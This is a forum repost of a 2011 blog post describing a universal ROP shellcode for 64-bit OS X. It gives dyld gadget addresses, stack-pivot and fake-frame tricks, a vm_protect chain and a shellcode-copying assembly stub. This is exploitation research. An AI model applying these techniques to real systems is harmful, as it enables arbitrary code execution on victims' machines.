Nytro Posted November 23, 2011 Report Posted November 23, 2011 Universal ROP shellcode for OS X x6423/07/2011 - pa_ktOne of the hurdles one will encounter during OS X exploitation is ASLR/DEP combination for 64-bit processes (32bit don’t have DEP [1]). When implemented correctly, it’s an effective mitigation, which can be circumvented only with an info leak. (Un)fortunately, OS X versions up to recent Lion (10.7) offer only incomplete ASLR which still allows attackers to succeed in their efforts to execute arbitrary code. One of the problems (among others) is dyld (dynamic loader) image being located at the same address in every process. This makes ROP possible — by controlling the stack, we can reuse snippets of code from dyld and, in effect, execute arbitrary code.The only public ROP dyld shellcode for OS X was presented in [1]. Charlie Miller’s version works under the assumption that that rax/rdi have specific values. Due to x64 calling convention [2] it is very probable that this precondition is met. Nevertheless it would be useful to create a shellcode with weaker assumptions — that’s exactly what this post is about. We will create a generic ROP shellcode, similiar to sayonara, but for OS XStack pivotingWe assume that rsp is fully controlled. Sometimes, achieving such state is a nontrivial task in itself — for every bug, exploitation can begin with different register/memory values. In [1], an easy case of stack pivoting is described — we start with rax pointing to controlled memory, and rdi to a valid buffer. We then set rsp = rax with:0x00007fff5fc24c8b mov QWORD PTR [rdi+0x38],rax(irrelevant)0x00007fff5fc24cd8 mov rsp,QWORD PTR [rdi+0x38]0x00007fff5fc24cdc pop rdi0x00007fff5fc24cdd retEasy! The problem is, we might not be so lucky to start with rax pointing to fully controlled memory. For example, we may start with the following:call [rax+0x100]Where memory in range [rax, rax+0xF0] is random, and we control buffer starting at rax+0xF1. Starting conditions for every bug are different and pivoting the stack can be even harder than creating a ROP chain, since during pivoting the state we start with can be completely arbitrary, when during ROP we already control the stack.There is no generic way to remedy this problem, but having a large database of usable gadgets would certainly help . That brings us to an annoying problem: “leave” instruction. “Leave” is equivalent to:mov rsp, rbppop rbpIf we don’t control rbp, we will lose control of the stack. The problem is, “leave” is very often present before “ret”, effectively limiting the number of gadgets we can use.Fortunately, there is a little trick that will allow us to use any “leave” gadget. We need to create a “fake” stack frame with a series of 3 indirect calls, like so:call [rax]+------------+(...)<--------------+ |call [rax+4]+ | | | | +----> push rbp | | mov rbp, rsp+-----------+ | (...)| | call [rax+8]+| | |+-->continue | +--------------+ | | | | | +->(gadget) | leave +--------+retStart from call [rax] and follow the execution flow along the arrows. With such construct, we can safely call any gadget ending with “leave / ret”. Such sequences (two indirect calls with different displacements near each other) may be rare, but we don’t need many of them, one is sufficient. We can use the second call (call [rax+4]) to jump to a sequence that will perturb rax and then jump back to “call [rax]“, allowing us to use the same “dispatcher” gadget as many times as we need to use a “leaver”. Here’s an example of such dispatcher, from dyld:DISPATCHER:__text:00007FFF5FC0D1BF call qword ptr [rax+78h]__text:00007FFF5FC0D1C2 mov rsi, rax__text:00007FFF5FC0D1C5 test rax, rax__text:00007FFF5FC0D1C8 jz short loc_7FFF5FC0D1E0__text:00007FFF5FC0D1CA mov rax, [rbx]__text:00007FFF5FC0D1CD mov rcx, rbx__text:00007FFF5FC0D1D0 mov rdx, r12__text:00007FFF5FC0D1D3 mov rdi, rbx__text:00007FFF5FC0D1D6 call qword ptr [rax+80h]FAKE FRAME SETUP:__text:00007FFF5FC0CD44 push rbp__text:00007FFF5FC0CD45 mov rbp, rsp__text:00007FFF5FC0CD48 mov [rbp+var_18], rbx__text:00007FFF5FC0CD4C mov [rbp+var_10], r12__text:00007FFF5FC0CD50 mov [rbp+var_8], r13__text:00007FFF5FC0CD54 sub rsp, 20h__text:00007FFF5FC0CD58 mov r12, rdi__text:00007FFF5FC0CD5B mov r13d, esi__text:00007FFF5FC0CD5E mov rax, [rdi]__text:00007FFF5FC0CD61 call qword ptr [rax+1A0h]Few preconditions related to register values must be met, for the gadgets above to work. Since we don’t control the stack during pivoting, we need to use gadgets ending with indirect jumps, or calls, to set registers and memory to necessary values.“Leave” problem is particulary crippling during pivoting and that’s when fake frames should be used. During ROP, it’s easier to just control rbp and point it to memory set earlier.ROPPlan is simple: use gadgets from dyld to create RWX memory area (using vm_protect), then copy normal shellcode to that area, and jump to it.Here’s the vm_protect call we will use to make memory from dyld’s .data section executable:__text:00007FFF5FC0D34A mov r8d, ebx ; new_protection__text:00007FFF5FC0D34D xor ecx, ecx ; set_maximum__text:00007FFF5FC0D34F mov rdx, rax ; size__text:00007FFF5FC0D352 mov rsi, [rbp+address] ; address__text:00007FFF5FC0D356 lea rax, _mach_task_self___text:00007FFF5FC0D35D mov edi, [rax] ; target_task__text:00007FFF5FC0D35F call _vm_protect__text:00007FFF5FC0D364 test eax, eax__text:00007FFF5FC0D366 jz short loc_7FFF5FC0D38D__text:00007FFF5FC0D38D loc_7FFF5FC0D38D:__text:00007FFF5FC0D38D cmp byte ptr [r12+0FAh], 0__text:00007FFF5FC0D396 jz short loc_7FFF5FC0D406__text:00007FFF5FC0D406 loc_7FFF5FC0D406:__text:00007FFF5FC0D406 mov rbx, [rbp+var_28]__text:00007FFF5FC0D40A mov r12, [rbp+var_20]__text:00007FFF5FC0D40E mov r13, [rbp+var_18]__text:00007FFF5FC0D412 mov r14, [rbp+var_10]__text:00007FFF5FC0D416 mov r15, [rbp+var_8]__text:00007FFF5FC0D41A leave__text:00007FFF5FC0D41B retnThis is the same technique as in [1]. Few registers need to be set for this to work: registers used as parameters for vm_protect and rbp, to survive “leave / ret” at the end. We can set them one by one, jumping over different gadgets like described in [1], or set them all at once, using the following:__text:00007FFF5FC24CA1 mov rax, [rdi]__text:00007FFF5FC24CA4 mov rbx, [rdi+8]__text:00007FFF5FC24CA8 mov rcx, [rdi+10h]__text:00007FFF5FC24CAC mov rdx, [rdi+18h]__text:00007FFF5FC24CB0 mov rsi, [rdi+28h]__text:00007FFF5FC24CB4 mov rbp, [rdi+30h]__text:00007FFF5FC24CB8 mov r8, [rdi+40h]__text:00007FFF5FC24CBC mov r9, [rdi+48h]__text:00007FFF5FC24CC0 mov r10, [rdi+50h]__text:00007FFF5FC24CC4 mov r11, [rdi+58h]__text:00007FFF5FC24CC8 mov r12, [rdi+60h]__text:00007FFF5FC24CCC mov r13, [rdi+68h]__text:00007FFF5FC24CD0 mov r14, [rdi+70h]__text:00007FFF5FC24CD4 mov r15, [rdi+78h]__text:00007FFF5FC24CD8 mov rsp, [rdi+38h]__text:00007FFF5FC24CDC pop rdi__text:00007FFF5FC24CDD retnWe can fill a buffer from dyld’s .data section with values we want to set registers with and simply call the above gadget. The only problem with this approach is rsp being overwritten (mov rsp, [rdi+38h]), but we can remedy this by creating a “fake” stack somewhere in memory .Below is a WRITE MEM gadget sequence we can use.__text:00007FFF5FC23373 pop rbx__text:00007FFF5FC23374 retn__text:00007FFF5FC24CDC pop rdi__text:00007FFF5FC24CDD retn__text:00007FFF5FC24CE1 mov [rdi+8], rbx__text:00007FFF5FC24CE5 mov [rdi+10h], rcx__text:00007FFF5FC24CE9 mov [rdi+18h], rdx__text:00007FFF5FC24CED mov [rdi+20h], rdi__text:00007FFF5FC24CF1 mov [rdi+28h], rsi__text:00007FFF5FC24CF5 mov [rdi+30h], rbp__text:00007FFF5FC24CF9 mov [rdi+38h], rsp__text:00007FFF5FC24CFD add qword ptr [rdi+38h], 8__text:00007FFF5FC24D02 mov [rdi+40h], r8__text:00007FFF5FC24D06 mov [rdi+48h], r9__text:00007FFF5FC24D0A mov [rdi+50h], r10__text:00007FFF5FC24D0E mov [rdi+58h], r11__text:00007FFF5FC24D12 mov [rdi+60h], r12__text:00007FFF5FC24D16 mov [rdi+68h], r13__text:00007FFF5FC24D1A mov [rdi+70h], r14__text:00007FFF5FC24D1E mov [rdi+78h], r15__text:00007FFF5FC24D22 mov rsi, [rsp+0]__text:00007FFF5FC24D26 mov [rdi+80h], rsi__text:00007FFF5FC24D2D retnFirst we pop the value, then the address and finally set memory with “mov [rdi+8], rbx”. Notice that we also trash values higher is memory, from rdi+0x10, to rdi+0x80, so we need to remember to write to LOWER addresses first.We could copy our “normal shellcode” to RWX memory using the above sequence, but it would be wasteful in terms of stack space. Observe that to copy a single QWORD, we need 5 QWORDs on the stack (3 gadgets, address, value). It’s more efficient to create a small “stub” that will take care of this.; copy normal shellcode to RWX area; size = 0x1000stub: lea rsi, [r15+offset] xor rcx, rcx inc rcx shl rcx, 12 lea rdi, [rel normal_shellcode] ;rip relative addressing rep movsbnormal_shellcode:rsi is set to point to old stack (passed in r15), normal shellcode starts from a constant offset. We save a bit of space using rip-relative addressing (x64 feature) to set rdi, rather than a constant 8-byte address.To summarize:set register values in dyld’s .data buffercreate a fake stack and a fake stack frame in memorycopy stub to future RWX areaset all registers to correct valuesuse vm_protect to create RWX areaload r15 with previous stack pointerjump to RWX memorystub will copy our “normal” shellcode from old stack to RWX mem???PROFIT!That’s it. The resulting ROP shellcode is bigger than the one in [1], but it doesn’t assume anything about registers. There is room for improvement, but in environments where you can spray megabytes of memory with javascript (like in Safari ), size of shellcode is not critical.You can download the final version here.References:[1] Charlie Miller, Mac OS X Hacking (Snow Leopard Edition), 2010[2] Jon Larimer, Intro to x64 Reversing, 2011Sursa: http://gdtr.wordpress.com/2011/07/23/universal-rop-shellcode-for-os-x-x64/ Quote